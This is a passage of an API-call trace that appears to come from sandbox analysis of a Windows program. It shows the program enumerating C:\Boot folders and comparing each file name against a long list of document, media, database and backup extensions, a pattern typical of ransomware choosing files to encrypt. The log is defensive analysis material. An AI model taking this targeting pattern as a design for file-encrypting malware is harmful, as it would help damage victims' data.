	[0032.864] FindNextFileW (in: hFindFile=0x7e5ef50, lpFindFileData=0xaa5fa84 | out: lpFindFileData=0xaa5fa84*(dwFileAttributes=0x16, ftCreationTime.dwLowDateTime=0xac015040, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac30ebc0, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xac30ebc0, ftLastWriteTime.dwHighDateTime=0x1d2de32, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1
	[0032.864] FindNextFileW (in: hFindFile=0x7e5ef50, lpFindFileData=0xaa5fa84 | out: lpFindFileData=0xaa5fa84*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xac2e8a60, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0x2ebf9340, ftLastAccessTime.dwHighDateTime=0x1d4d597, ftLastWriteTime.dwLowDateTime=0x2ebf9340, ftLastWriteTime.dwHighDateTime=0x1d4d597, nFileSizeHigh=0x0, nFileSizeLow=0x6000, dwReserved0=0x0, dwReserved1=0x0, cFileName="BCD", cAlternateFileName="")) returned 1
	[0032.864] lstrlenW (lpString="BCD") returned 3
	[0032.864] lstrlenW (lpString=".1cd") returned 4
	[0032.864] lstrcmpiW (lpString1=".1cd", lpString2="") returned 1
	[0032.864] lstrlenW (lpString=".3ds") returned 4
	[0032.864] lstrcmpiW (lpString1=".3ds", lpString2="") returned 1
	[0032.864] lstrlenW (lpString=".3fr") returned 4
	[0032.864] lstrcmpiW (lpString1=".3fr", lpString2="") returned 1
	[0032.864] lstrlenW (lpString=".3g2") returned 4
	[0032.864] lstrcmpiW (lpString1=".3g2", lpString2="") returned 1
	[0032.864] lstrlenW (lpString=".3gp") returned 4
	[0032.864] lstrcmpiW (lpString1=".3gp", lpString2="") returned 1
	[0032.864] lstrlenW (lpString=".7z") returned 3
	[0032.864] lstrcmpiW (lpString1=".7z", lpString2="BCD") returned -1
	[0032.864] lstrlenW (lpString=".accda") returned 6
	[0032.864] lstrcmpiW (lpString1=".accda", lpString2="") returned 1
	[0032.864] lstrlenW (lpString=".accdb") returned 6
	[0032.864] lstrcmpiW (lpString1=".accdb", lpString2="") returned 1
	[0032.864] lstrlenW (lpString=".accdc") returned 6
	[0032.864] lstrcmpiW (lpString1=".accdc", lpString2="") returned 1
	[0032.864] lstrlenW (lpString=".accde") returned 6
	[0032.865] lstrcmpiW (lpString1=".accde", lpString2="") returned 1
	[0032.865] lstrlenW (lpString=".accdt") returned 6
	[0032.865] lstrcmpiW (lpString1=".accdt", lpString2="") returned 1
	[0032.865] lstrlenW (lpString=".accdw") returned 6
	[0032.865] lstrcmpiW (lpString1=".accdw", lpString2="") returned 1
	[0032.865] lstrlenW (lpString=".adb") returned 4
	[0032.865] lstrcmpiW (lpString1=".adb", lpString2="") returned 1
	[0032.865] lstrlenW (lpString=".adp") returned 4
	[0032.865] lstrcmpiW (lpString1=".adp", lpString2="") returned 1
	[0032.865] lstrlenW (lpString=".ai") returned 3
	[0032.865] lstrcmpiW (lpString1=".ai", lpString2="BCD") returned -1
	[0032.865] lstrlenW (lpString=".ai3") returned 4
	[0032.865] lstrcmpiW (lpString1=".ai3", lpString2="") returned 1
	[0032.865] lstrlenW (lpString=".ai4") returned 4
	[0032.865] lstrcmpiW (lpString1=".ai4", lpString2="") returned 1
	[0032.865] lstrlenW (lpString=".ai5") returned 4
	[0032.865] lstrcmpiW (lpString1=".ai5", lpString2="") returned 1
	[0032.865] lstrlenW (lpString=".ai6") returned 4
	[0032.865] lstrcmpiW (lpString1=".ai6", lpString2="") returned 1
	[0032.865] lstrlenW (lpString=".ai7") returned 4
	[0032.865] lstrcmpiW (lpString1=".ai7", lpString2="") returned 1
	[0032.865] lstrlenW (lpString=".ai8") returned 4
	[0032.865] lstrcmpiW (lpString1=".ai8", lpString2="") returned 1
	[0032.865] lstrlenW (lpString=".anim") returned 5
	[0032.865] lstrcmpiW (lpString1=".anim", lpString2="") returned 1
	[0032.865] lstrlenW (lpString=".arw") returned 4
	[0032.865] lstrcmpiW (lpString1=".arw", lpString2="") returned 1
	[0032.865] lstrlenW (lpString=".as") returned 3
	[0032.865] lstrcmpiW (lpString1=".as", lpString2="BCD") returned -1
	[0032.865] lstrlenW (lpString=".asa") returned 4
	[0032.865] lstrcmpiW (lpString1=".asa", lpString2="") returned 1
	[0032.865] lstrlenW (lpString=".asc") returned 4
	[0032.865] lstrcmpiW (lpString1=".asc", lpString2="") returned 1
	[0032.866] lstrlenW (lpString=".ascx") returned 5
	[0032.866] lstrcmpiW (lpString1=".ascx", lpString2="") returned 1
	[0032.866] lstrlenW (lpString=".asm") returned 4
	[0032.866] lstrcmpiW (lpString1=".asm", lpString2="") returned 1
	[0032.866] lstrlenW (lpString=".asmx") returned 5
	[0032.866] lstrcmpiW (lpString1=".asmx", lpString2="") returned 1
	[0032.866] lstrlenW (lpString=".asp") returned 4
	[0032.866] lstrcmpiW (lpString1=".asp", lpString2="") returned 1
	[0032.866] lstrlenW (lpString=".aspx") returned 5
	[0032.866] lstrcmpiW (lpString1=".aspx", lpString2="") returned 1
	[0032.866] lstrlenW (lpString=".asr") returned 4
	[0032.866] lstrcmpiW (lpString1=".asr", lpString2="") returned 1
	[0032.866] lstrlenW (lpString=".asx") returned 4
	[0032.866] lstrcmpiW (lpString1=".asx", lpString2="") returned 1
	[0032.866] lstrlenW (lpString=".avi") returned 4
	[0032.866] lstrcmpiW (lpString1=".avi", lpString2="") returned 1
	[0032.866] lstrlenW (lpString=".avs") returned 4
	[0032.866] lstrcmpiW (lpString1=".avs", lpString2="") returned 1
	[0032.866] lstrlenW (lpString=".backup") returned 7
	[0032.866] lstrcmpiW (lpString1=".backup", lpString2="") returned 1
	[0032.866] lstrlenW (lpString=".bak") returned 4
	[0032.866] lstrcmpiW (lpString1=".bak", lpString2="") returned 1
	[0032.866] lstrlenW (lpString=".bay") returned 4
	[0032.866] lstrcmpiW (lpString1=".bay", lpString2="") returned 1
	[0032.866] lstrlenW (lpString=".bd") returned 3
	[0032.866] lstrcmpiW (lpString1=".bd", lpString2="BCD") returned -1
	[0032.866] lstrlenW (lpString=".bin") returned 4
	[0032.866] lstrcmpiW (lpString1=".bin", lpString2="") returned 1
	[0032.866] lstrlenW (lpString=".bmp") returned 4
	[0032.866] lstrcmpiW (lpString1=".bmp", lpString2="") returned 1
	[0032.866] lstrlenW (lpString=".bz2") returned 4
	[0032.866] lstrcmpiW (lpString1=".bz2", lpString2="") returned 1
	[0032.866] lstrlenW (lpString=".c") returned 2
	[0032.866] lstrcmpiW (lpString1=".c", lpString2="CD") returned -1
	[0032.867] lstrlenW (lpString=".cdr") returned 4
	[0032.867] lstrcmpiW (lpString1=".cdr", lpString2="") returned 1
	[0032.867] lstrlenW (lpString=".cer") returned 4
	[0032.867] lstrcmpiW (lpString1=".cer", lpString2="") returned 1
	[0032.867] lstrlenW (lpString=".cf") returned 3
	[0032.867] lstrcmpiW (lpString1=".cf", lpString2="BCD") returned -1
	[0032.867] lstrlenW (lpString=".cfc") returned 4
	[0032.867] lstrcmpiW (lpString1=".cfc", lpString2="") returned 1
	[0032.867] lstrlenW (lpString=".cfm") returned 4
	[0032.867] lstrcmpiW (lpString1=".cfm", lpString2="") returned 1
	[0032.867] lstrlenW (lpString=".cfml") returned 5
	[0032.867] lstrcmpiW (lpString1=".cfml", lpString2="") returned 1
	[0032.867] lstrlenW (lpString=".cfu") returned 4
	[0032.867] lstrcmpiW (lpString1=".cfu", lpString2="") returned 1
	[0032.867] lstrlenW (lpString=".chm") returned 4
	[0032.867] lstrcmpiW (lpString1=".chm", lpString2="") returned 1
	[0032.867] lstrlenW (lpString=".cin") returned 4
	[0032.867] lstrcmpiW (lpString1=".cin", lpString2="") returned 1
	[0032.867] lstrlenW (lpString=".class") returned 6
	[0032.867] lstrcmpiW (lpString1=".class", lpString2="") returned 1
	[0032.867] lstrlenW (lpString=".clx") returned 4
	[0032.867] lstrcmpiW (lpString1=".clx", lpString2="") returned 1
	[0032.867] lstrlenW (lpString=".config") returned 7
	[0032.867] lstrcmpiW (lpString1=".config", lpString2="") returned 1
	[0032.867] lstrlenW (lpString=".cpp") returned 4
	[0032.867] lstrcmpiW (lpString1=".cpp", lpString2="") returned 1
	[0032.867] lstrlenW (lpString=".cr2") returned 4
	[0032.867] lstrcmpiW (lpString1=".cr2", lpString2="") returned 1
	[0032.867] lstrlenW (lpString=".crt") returned 4
	[0032.867] lstrcmpiW (lpString1=".crt", lpString2="") returned 1
	[0032.867] lstrlenW (lpString=".crw") returned 4
	[0032.867] lstrcmpiW (lpString1=".crw", lpString2="") returned 1
	[0032.867] lstrlenW (lpString=".cs") returned 3
	[0032.868] lstrcmpiW (lpString1=".cs", lpString2="BCD") returned -1
	[0032.868] lstrlenW (lpString=".css") returned 4
	[0032.868] lstrcmpiW (lpString1=".css", lpString2="") returned 1
	[0032.868] lstrlenW (lpString=".csv") returned 4
	[0032.868] lstrcmpiW (lpString1=".csv", lpString2="") returned 1
	[0032.868] lstrlenW (lpString=".cub") returned 4
	[0032.868] lstrcmpiW (lpString1=".cub", lpString2="") returned 1
	[0032.868] lstrlenW (lpString=".dae") returned 4
	[0032.868] lstrcmpiW (lpString1=".dae", lpString2="") returned 1
	[0032.868] lstrlenW (lpString=".dat") returned 4
	[0032.868] lstrcmpiW (lpString1=".dat", lpString2="") returned 1
	[0032.868] lstrlenW (lpString=".db") returned 3
	[0032.868] lstrcmpiW (lpString1=".db", lpString2="BCD") returned -1
	[0032.868] lstrlenW (lpString=".dbf") returned 4
	[0032.868] lstrcmpiW (lpString1=".dbf", lpString2="") returned 1
	[0032.868] lstrlenW (lpString=".dbx") returned 4
	[0032.868] lstrcmpiW (lpString1=".dbx", lpString2="") returned 1
	[0032.868] lstrlenW (lpString=".dc3") returned 4
	[0032.868] lstrcmpiW (lpString1=".dc3", lpString2="") returned 1
	[0032.868] lstrlenW (lpString=".dcm") returned 4
	[0032.868] lstrcmpiW (lpString1=".dcm", lpString2="") returned 1
	[0032.868] lstrlenW (lpString=".dcr") returned 4
	[0032.868] lstrcmpiW (lpString1=".dcr", lpString2="") returned 1
	[0032.868] lstrlenW (lpString=".der") returned 4
	[0032.868] lstrcmpiW (lpString1=".der", lpString2="") returned 1
	[0032.868] lstrlenW (lpString=".dib") returned 4
	[0032.868] lstrcmpiW (lpString1=".dib", lpString2="") returned 1
	[0032.868] lstrlenW (lpString=".dic") returned 4
	[0032.868] lstrcmpiW (lpString1=".dic", lpString2="") returned 1
	[0032.868] lstrlenW (lpString=".dif") returned 4
	[0032.868] lstrcmpiW (lpString1=".dif", lpString2="") returned 1
	[0032.868] lstrlenW (lpString=".divx") returned 5
	[0032.868] lstrcmpiW (lpString1=".divx", lpString2="") returned 1
	[0032.868] lstrlenW (lpString=".djvu") returned 5
	[0032.869] lstrcmpiW (lpString1=".djvu", lpString2="") returned 1
	[0032.869] lstrlenW (lpString=".dng") returned 4
	[0032.869] lstrcmpiW (lpString1=".dng", lpString2="") returned 1
	[0032.869] lstrlenW (lpString=".doc") returned 4
	[0032.869] lstrcmpiW (lpString1=".doc", lpString2="") returned 1
	[0032.869] lstrlenW (lpString=".docm") returned 5
	[0032.869] lstrcmpiW (lpString1=".docm", lpString2="") returned 1
	[0032.869] lstrlenW (lpString=".docx") returned 5
	[0032.869] lstrcmpiW (lpString1=".docx", lpString2="") returned 1
	[0032.869] lstrlenW (lpString=".dot") returned 4
	[0032.869] lstrcmpiW (lpString1=".dot", lpString2="") returned 1
	[0032.869] lstrlenW (lpString=".dotm") returned 5
	[0032.869] lstrcmpiW (lpString1=".dotm", lpString2="") returned 1
	[0032.869] lstrlenW (lpString=".dotx") returned 5
	[0032.869] lstrcmpiW (lpString1=".dotx", lpString2="") returned 1
	[0032.869] lstrlenW (lpString=".dpx") returned 4
	[0032.869] lstrcmpiW (lpString1=".dpx", lpString2="") returned 1
	[0032.869] lstrlenW (lpString=".dqy") returned 4
	[0032.869] lstrcmpiW (lpString1=".dqy", lpString2="") returned 1
	[0032.869] lstrlenW (lpString=".dsn") returned 4
	[0032.869] lstrcmpiW (lpString1=".dsn", lpString2="") returned 1
	[0032.869] lstrlenW (lpString=".dt") returned 3
	[0032.869] lstrcmpiW (lpString1=".dt", lpString2="BCD") returned -1
	[0032.869] lstrlenW (lpString=".dtd") returned 4
	[0032.869] lstrcmpiW (lpString1=".dtd", lpString2="") returned 1
	[0032.869] lstrlenW (lpString=".dwg") returned 4
	[0032.869] lstrcmpiW (lpString1=".dwg", lpString2="") returned 1
	[0032.869] lstrlenW (lpString=".dwt") returned 4
	[0032.869] lstrcmpiW (lpString1=".dwt", lpString2="") returned 1
	[0032.869] lstrlenW (lpString=".dx") returned 3
	[0032.869] lstrcmpiW (lpString1=".dx", lpString2="BCD") returned -1
	[0032.869] lstrlenW (lpString=".dxf") returned 4
	[0032.869] lstrcmpiW (lpString1=".dxf", lpString2="") returned 1
	[0032.869] lstrlenW (lpString=".edml") returned 5
	[0032.870] lstrcmpiW (lpString1=".edml", lpString2="") returned 1
	[0032.870] lstrlenW (lpString=".efd") returned 4
	[0032.870] lstrcmpiW (lpString1=".efd", lpString2="") returned 1
	[0032.870] lstrlenW (lpString=".elf") returned 4
	[0032.870] lstrcmpiW (lpString1=".elf", lpString2="") returned 1
	[0032.870] lstrlenW (lpString=".emf") returned 4
	[0032.870] lstrcmpiW (lpString1=".emf", lpString2="") returned 1
	[0032.870] lstrlenW (lpString=".emz") returned 4
	[0032.870] lstrcmpiW (lpString1=".emz", lpString2="") returned 1
	[0032.870] lstrlenW (lpString=".epf") returned 4
	[0032.870] lstrcmpiW (lpString1=".epf", lpString2="") returned 1
	[0032.870] lstrlenW (lpString=".eps") returned 4
	[0032.870] lstrcmpiW (lpString1=".eps", lpString2="") returned 1
	[0032.870] lstrlenW (lpString=".epsf") returned 5
	[0032.870] lstrcmpiW (lpString1=".epsf", lpString2="") returned 1
	[0032.870] lstrlenW (lpString=".epsp") returned 5
	[0032.870] lstrcmpiW (lpString1=".epsp", lpString2="") returned 1
	[0032.870] lstrlenW (lpString=".erf") returned 4
	[0032.870] lstrcmpiW (lpString1=".erf", lpString2="") returned 1
	[0032.870] lstrlenW (lpString=".exr") returned 4
	[0032.870] lstrcmpiW (lpString1=".exr", lpString2="") returned 1
	[0032.870] lstrlenW (lpString=".f4v") returned 4
	[0032.870] lstrcmpiW (lpString1=".f4v", lpString2="") returned 1
	[0032.870] lstrlenW (lpString=".fido") returned 5
	[0032.870] lstrcmpiW (lpString1=".fido", lpString2="") returned 1
	[0032.870] lstrlenW (lpString=".flm") returned 4
	[0032.870] lstrcmpiW (lpString1=".flm", lpString2="") returned 1
	[0032.870] lstrlenW (lpString=".flv") returned 4
	[0032.870] lstrcmpiW (lpString1=".flv", lpString2="") returned 1
	[0032.870] lstrlenW (lpString=".frm") returned 4
	[0032.870] lstrcmpiW (lpString1=".frm", lpString2="") returned 1
	[0032.870] lstrlenW (lpString=".fxg") returned 4
	[0032.870] lstrcmpiW (lpString1=".fxg", lpString2="") returned 1
	[0032.871] RtlAllocateHeap (HeapHandle=0x7d60000, Flags=0x0, Size=0xfffe) returned 0xb420068
	[0032.871] FindFirstFileW (in: lpFileName="C:\\Boot\\cs-CZ\\*", lpFindFileData=0xaa5f808 | out: lpFindFileData=0xaa5f808*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xac015040, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac015040, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xac015040, ftLastWriteTime.dwHighDateTime=0x1d2de32, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x7e5ff98
	[0032.871] FindNextFileW (in: hFindFile=0x7e5ff98, lpFindFileData=0xaa5f808 | out: lpFindFileData=0xaa5f808*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xac015040, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac015040, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xac015040, ftLastWriteTime.dwHighDateTime=0x1d2de32, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1
	[0032.871] FindNextFileW (in: hFindFile=0x7e5ff98, lpFindFileData=0xaa5f808 | out: lpFindFileData=0xaa5f808*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xac015040, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac015040, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xe88a2888, ftLastWriteTime.dwHighDateTime=0x1ca0420, nFileSizeHigh=0x0, nFileSizeLow=0x15c50, dwReserved0=0x0, dwReserved1=0x0, cFileName="bootmgr.exe.mui", cAlternateFileName="BOOTMG~1.MUI")) returned 1
	[0032.872] FindClose (in: hFindFile=0x7e5ff98 | out: hFindFile=0x7e5ff98) returned 1
	[0032.872] HeapFree (in: hHeap=0x7d60000, dwFlags=0x0, lpMem=0xb420068 | out: hHeap=0x7d60000) returned 1
	[0032.872] FindNextFileW (in: hFindFile=0x7e5ef50, lpFindFileData=0xaa5fa84 | out: lpFindFileData=0xaa5fa84*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xac015040, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac03b1a0, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xac03b1a0, ftLastWriteTime.dwHighDateTime=0x1d2de32, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="da-DK", cAlternateFileName="")) returned 1
	[0032.872] RtlAllocateHeap (HeapHandle=0x7d60000, Flags=0x0, Size=0xfffe) returned 0xb420068
	[0032.872] FindFirstFileW (in: lpFileName="C:\\Boot\\da-DK\\*", lpFindFileData=0xaa5f808 | out: lpFindFileData=0xaa5f808*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xac015040, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac03b1a0, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xac03b1a0, ftLastWriteTime.dwHighDateTime=0x1d2de32, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x7e5ff98
	[0032.872] FindNextFileW (in: hFindFile=0x7e5ff98, lpFindFileData=0xaa5f808 | out: lpFindFileData=0xaa5f808*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xac015040, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac03b1a0, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xac03b1a0, ftLastWriteTime.dwHighDateTime=0x1d2de32, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1
	[0032.872] FindNextFileW (in: hFindFile=0x7e5ff98, lpFindFileData=0xaa5f808 | out: lpFindFileData=0xaa5f808*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xac03b1a0, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac03b1a0, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xe868d5aa, ftLastWriteTime.dwHighDateTime=0x1ca0420, nFileSizeHigh=0x0, nFileSizeLow=0x15640, dwReserved0=0x0, dwReserved1=0x0, cFileName="bootmgr.exe.mui", cAlternateFileName="BOOTMG~1.MUI")) returned 1
	[0032.873] FindClose (in: hFindFile=0x7e5ff98 | out: hFindFile=0x7e5ff98) returned 1
	[0032.873] HeapFree (in: hHeap=0x7d60000, dwFlags=0x0, lpMem=0xb420068 | out: hHeap=0x7d60000) returned 1
	[0032.873] FindNextFileW (in: hFindFile=0x7e5ef50, lpFindFileData=0xaa5fa84 | out: lpFindFileData=0xaa5fa84*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xac03b1a0, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac03b1a0, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xac03b1a0, ftLastWriteTime.dwHighDateTime=0x1d2de32, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="de-DE", cAlternateFileName="")) returned 1
	[0032.873] RtlAllocateHeap (HeapHandle=0x7d60000, Flags=0x0, Size=0xfffe) returned 0xb420068
	[0032.873] FindFirstFileW (in: lpFileName="C:\\Boot\\de-DE\\*", lpFindFileData=0xaa5f808 | out: lpFindFileData=0xaa5f808*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xac03b1a0, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac03b1a0, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xac03b1a0, ftLastWriteTime.dwHighDateTime=0x1d2de32, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x7e5ff98
	[0032.874] FindNextFileW (in: hFindFile=0x7e5ff98, lpFindFileData=0xaa5f808 | out: lpFindFileData=0xaa5f808*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xac03b1a0, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac03b1a0, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xac03b1a0, ftLastWriteTime.dwHighDateTime=0x1d2de32, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1
	[0032.874] FindNextFileW (in: hFindFile=0x7e5ff98, lpFindFileData=0xaa5f808 | out: lpFindFileData=0xaa5f808*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xac03b1a0, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac03b1a0, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xe8132526, ftLastWriteTime.dwHighDateTime=0x1ca0420, nFileSizeHigh=0x0, nFileSizeLow=0x16640, dwReserved0=0x0, dwReserved1=0x0, cFileName="bootmgr.exe.mui", cAlternateFileName="BOOTMG~1.MUI")) returned 1
	[0032.874] FindClose (in: hFindFile=0x7e5ff98 | out: hFindFile=0x7e5ff98) returned 1
	[0032.874] HeapFree (in: hHeap=0x7d60000, dwFlags=0x0, lpMem=0xb420068 | out: hHeap=0x7d60000) returned 1
	[0032.874] FindNextFileW (in: hFindFile=0x7e5ef50, lpFindFileData=0xaa5fa84 | out: lpFindFileData=0xaa5fa84*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xac03b1a0, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac03b1a0, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xac03b1a0, ftLastWriteTime.dwHighDateTime=0x1d2de32, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="el-GR", cAlternateFileName="")) returned 1
	[0032.874] RtlAllocateHeap (HeapHandle=0x7d60000, Flags=0x0, Size=0xfffe) returned 0xb420068
	[0032.874] FindFirstFileW (in: lpFileName="C:\\Boot\\el-GR\\*", lpFindFileData=0xaa5f808 | out: lpFindFileData=0xaa5f808*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xac03b1a0, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac03b1a0, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xac03b1a0, ftLastWriteTime.dwHighDateTime=0x1d2de32, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x7e5ff98
	[0032.875] FindNextFileW (in: hFindFile=0x7e5ff98, lpFindFileData=0xaa5f808 | out: lpFindFileData=0xaa5f808*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xac03b1a0, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac03b1a0, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xac03b1a0, ftLastWriteTime.dwHighDateTime=0x1d2de32, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1
	[0032.875] FindNextFileW (in: hFindFile=0x7e5ff98, lpFindFileData=0xaa5f808 | out: lpFindFileData=0xaa5f808*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xac03b1a0, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac03b1a0, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xea239054, ftLastWriteTime.dwHighDateTime=0x1ca0420, nFileSizeHigh=0x0, nFileSizeLow=0x17250, dwReserved0=0x0, dwReserved1=0x0, cFileName="bootmgr.exe.mui", cAlternateFileName="BOOTMG~1.MUI")) returned 1
	[0032.875] FindClose (in: hFindFile=0x7e5ff98 | out: hFindFile=0x7e5ff98) returned 1
	[0032.875] HeapFree (in: hHeap=0x7d60000, dwFlags=0x0, lpMem=0xb420068 | out: hHeap=0x7d60000) returned 1
	[0032.875] FindNextFileW (in: hFindFile=0x7e5ef50, lpFindFileData=0xaa5fa84 | out: lpFindFileData=0xaa5fa84*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xac03b1a0, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac03b1a0, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xac03b1a0, ftLastWriteTime.dwHighDateTime=0x1d2de32, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="en-US", cAlternateFileName="")) returned 1
	[0032.875] RtlAllocateHeap (HeapHandle=0x7d60000, Flags=0x0, Size=0xfffe) returned 0xb420068
	[0032.875] FindFirstFileW (in: lpFileName="C:\\Boot\\en-US\\*", lpFindFileData=0xaa5f808 | out: lpFindFileData=0xaa5f808*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xac03b1a0, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac03b1a0, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xac03b1a0, ftLastWriteTime.dwHighDateTime=0x1d2de32, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x7e5ff98
	[0032.878] FindNextFileW (in: hFindFile=0x7e5ff98, lpFindFileData=0xaa5f808 | out: lpFindFileData=0xaa5f808*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xac03b1a0, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac03b1a0, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xac03b1a0, ftLastWriteTime.dwHighDateTime=0x1d2de32, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1
	[0032.878] FindNextFileW (in: hFindFile=0x7e5ff98, lpFindFileData=0xaa5f808 | out: lpFindFileData=0xaa5f808*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xac03b1a0, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac03b1a0, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xe8216d3c, ftLastWriteTime.dwHighDateTime=0x1ca0420, nFileSizeHigh=0x0, nFileSizeLow=0x14c40, dwReserved0=0x0, dwReserved1=0x0, cFileName="bootmgr.exe.mui", cAlternateFileName="BOOTMG~1.MUI")) returned 1
	[0032.878] FindClose (in: hFindFile=0x7e5ff98 | out: hFindFile=0x7e5ff98) returned 1
	[0032.878] HeapFree (in: hHeap=0x7d60000, dwFlags=0x0, lpMem=0xb420068 | out: hHeap=0x7d60000) returned 1
